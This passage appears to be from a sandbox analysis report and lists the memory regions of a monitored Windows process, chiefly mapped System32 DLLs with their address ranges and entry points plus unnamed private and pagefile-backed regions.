0x7ffb1ec014d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 1956 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1957 start_va = 0x7ffb1ec70000 end_va = 0x7ffb1eca6fff monitored = 0 entry_point = 0x7ffb1ec76020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 1958 start_va = 0x7ffb1ecb0000 end_va = 0x7ffb1eccffff monitored = 0 entry_point = 0x7ffb1ecb39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 1959 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1960 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 1961 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 1962 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1963 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1964 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1965 start_va = 0x7ffb21180000 end_va = 0x7ffb212fbfff monitored = 0 entry_point = 0x7ffb211d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 1966 start_va = 0x7ffb21300000 end_va = 0x7ffb2130afff monitored = 0 entry_point = 0x7ffb21301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 1967 start_va = 0x7ffb21310000 end_va = 0x7ffb21326fff monitored = 0 entry_point = 0x7ffb21315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1968 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1969 start_va = 0x7ffb21370000 end_va = 0x7ffb21396fff monitored = 0 entry_point = 0x7ffb21373bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 1970 start_va = 0x7ffb213a0000 end_va = 0x7ffb213f4fff monitored = 0 entry_point = 0x7ffb213afc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1971 start_va = 0x7ffb21400000 end_va = 0x7ffb21412fff monitored = 0 entry_point = 0x7ffb214057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1972 start_va = 0x7ffb21420000 end_va = 0x7ffb2142bfff monitored = 0 entry_point = 0x7ffb21422830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1973 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1974 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1975 start_va = 0x7ffb21460000 end_va = 0x7ffb215acfff monitored = 0 entry_point = 0x7ffb214a3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1976 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1977 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 0x7ffb21787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1978 start_va = 0x7ffb218f0000 end_va = 0x7ffb21953fff monitored = 0 entry_point = 0x7ffb21905ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1979 start_va = 0x7ffb21b20000 end_va = 0x7ffb21b48fff monitored = 0 entry_point = 0x7ffb21b2ca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1980 start_va = 0x7ffb21b50000 end_va = 0x7ffb21b85fff monitored = 0 entry_point = 0x7ffb21b60070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1981 start_va = 0x7ffb22640000 end_va = 0x7ffb22647fff monitored = 0 entry_point = 0x7ffb226413e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1982 start_va = 0x7ffb22ee0000 end_va = 0x7ffb22f58fff monitored = 0 entry_point = 0x7ffb22effb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1983 start_va = 0x7ffb23110000 end_va = 0x7ffb235a2fff monitored = 0 entry_point = 0x7ffb2311f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1984 start_va = 0x7ffb235b0000 end_va = 0x7ffb23616fff monitored = 0 entry_point = 0x7ffb235ce710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1985 start_va = 0x7ffb23670000 end_va = 0x7ffb237f5fff monitored = 0 entry_point = 0x7ffb236bd700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1986 start_va = 0x7ffb23800000 end_va = 0x7ffb2381bfff monitored = 0 entry_point = 0x7ffb238037a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1987 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1988 start_va = 0x7ffb239d0000 end_va = 0x7ffb23a0ffff monitored = 0 entry_point = 0x7ffb239e1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1989 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1990 start_va = 0x7ffb23b60000 end_va = 0x7ffb23b86fff monitored = 0 entry_point = 0x7ffb23b67940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1991 start_va = 0x7ffb23b90000 end_va = 0x7ffb23c39fff monitored = 0 entry_point = 0x7ffb23bb7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1992 start_va = 0x7ffb23c40000 end_va = 0x7ffb23d3ffff monitored = 0 entry_point = 0x7ffb23c80f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1993 start_va = 0x7ffb23dd0000 end_va = 0x7ffb23ddbfff monitored = 0 entry_point = 0x7ffb23dd2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1994 start_va = 0x7ffb23ea0000 end_va = 0x7ffb23ed1fff monitored = 0 entry_point = 0x7ffb23eb2340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1995 start_va = 0x7ffb24110000 end_va = 0x7ffb2411bfff monitored = 0 entry_point = 0x7ffb24112790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1996 start_va = 0x7ffb24120000 end_va = 0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1997 start_va = 0x7ffb242c0000 end_va = 0x7ffb243b3fff monitored = 0 entry_point = 0x7ffb242ca960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1998 start_va = 0x7ffb24410000 end_va = 0x7ffb24458fff monitored = 0 entry_point = 0x7ffb2441a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1999 start_va = 0x7ffb24530000 end_va = 0x7ffb2453bfff monitored = 0 entry_point = 0x7ffb245327e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2000 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2001 start_va = 0x7ffb24670000 end_va = 0x7ffb246e9fff monitored = 0 entry_point = 0x7ffb24691a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2002 start_va = 0x7ffb24730000 end_va = 0x7ffb24763fff monitored = 0 entry_point = 0x7ffb2474ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2003 start_va = 0x7ffb24770000 end_va = 0x7ffb24779fff monitored = 0 entry_point = 0x7ffb24771830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2004 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2005 start_va = 0x7ffb249f0000 end_va = 0x7ffb24a4bfff monitored = 0 entry_point = 0x7ffb24a06f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2006 start_va = 0x7ffb24aa0000 end_va = 0x7ffb24ab6fff monitored = 0 entry_point = 0x7ffb24aa79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2007 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2008 start_va = 0x7ffb24c00000 end_va = 0x7ffb24c20fff monitored = 0 entry_point = 0x7ffb24c10250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2009 start_va = 0x7ffb24c50000 end_va = 0x7ffb24c89fff monitored = 0 entry_point = 0x7ffb24c58d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2010 start_va = 0x7ffb24c90000 end_va = 0x7ffb24cb6fff monitored = 0 entry_point = 0x7ffb24ca0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2011 start_va = 0x7ffb24da0000 end_va = 0x7ffb24dccfff monitored = 0 entry_point = 0x7ffb24db9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2012 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2013 start_va = 0x7ffb24f90000 end_va = 0x7ffb24fa8fff monitored = 0 entry_point = 0x7ffb24f95e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2014 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2015 start_va = 0x7ffb24fe0000 end_va = 0x7ffb25078fff monitored = 0 entry_point = 0x7ffb2500f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2016 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2017 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2018 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2019 start_va = 0x7ffb251a0000 end_va = 0x7ffb251affff monitored = 0 entry_point = 0x7ffb251a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2020 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2021 start_va = 0x7ffb253a0000 end_va = 0x7ffb253b6fff monitored = 0 entry_point = 0x7ffb253a1390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2022 start_va = 0x7ffb253c0000 end_va = 0x7ffb25586fff monitored = 0 entry_point = 0x7ffb2541db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2023 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2024 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2025 start_va = 0x7ffb25770000 end_va = 0x7ffb257f5fff monitored = 0 entry_point = 0x7ffb2577d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2026 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2027 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2028 start_va = 0x7ffb25ea0000 end_va = 0x7ffb25ef4fff monitored = 0 entry_point = 0x7ffb25eb7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2029 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2030 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2031 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2032 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2033 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2034 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2035 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2036 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2037 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2038 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2039 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2040 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2041 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2042 start_va = 0x7ffb284c0000 end_va = 0x7ffb288e8fff monitored = 0 entry_point = 0x7ffb284e8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2043 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2044 start_va = 0x7ffb28a40000 end_va = 0x7ffb28a47fff monitored = 0 entry_point = 0x7ffb28a41ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2045 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2046 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2145 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2146 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 2147 start_va = 0x1700000 end_va = 0x1742fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2148 start_va = 0x1750000 end_va = 0x17cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 2149 start_va = 0x2b90000 end_va = 0x2b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 2150 start_va = 0x2ba0000 end_va = 0x2baffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ba0000" filename = "" Region: id = 2151 start_va = 0x2bb0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bb0000" filename = "" Region: id = 2152 start_va = 0x2bc0000 end_va = 0x2bcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 2153 start_va = 0x2bd0000 end_va = 0x2bdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 2154 start_va = 0x2be0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002be0000" filename = "" Region: id = 2155 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2156 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 2157 start_va = 0x4d00000 end_va = 0x4d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 2158 start_va = 0x3600000 end_va = 0x364dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003600000" filename = "" Region: id = 2159 start_va = 0x4880000 end_va = 0x48cdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 2167 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 2168 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 2169 start_va = 0x10f0000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 2170 start_va = 0x17d0000 end_va = 0x17d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 2171 start_va = 0x17f0000 end_va = 0x17f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 2172 start_va = 0x21c0000 end_va = 0x21c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 2173 start_va = 0x21d0000 end_va = 0x21d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 2174 start_va = 0x21e0000 end_va = 0x21e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 2175 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2176 start_va = 0x2bf0000 end_va = 0x2bf3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 2177 start_va = 0x36e0000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 2178 start_va = 0x4b80000 end_va = 0x4b81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b80000" filename = "" Region: id = 2179 start_va = 0x4b90000 end_va = 0x4b9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2180 start_va = 0x4ba0000 end_va = 0x4baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 2181 start_va = 0x4bb0000 end_va = 0x4bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 2182 start_va = 0x4bc0000 end_va = 0x4bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bc0000" filename = "" Region: id = 2183 start_va = 0x4be0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004be0000" filename = "" Region: id = 2184 start_va = 0x4bf0000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bf0000" filename = "" 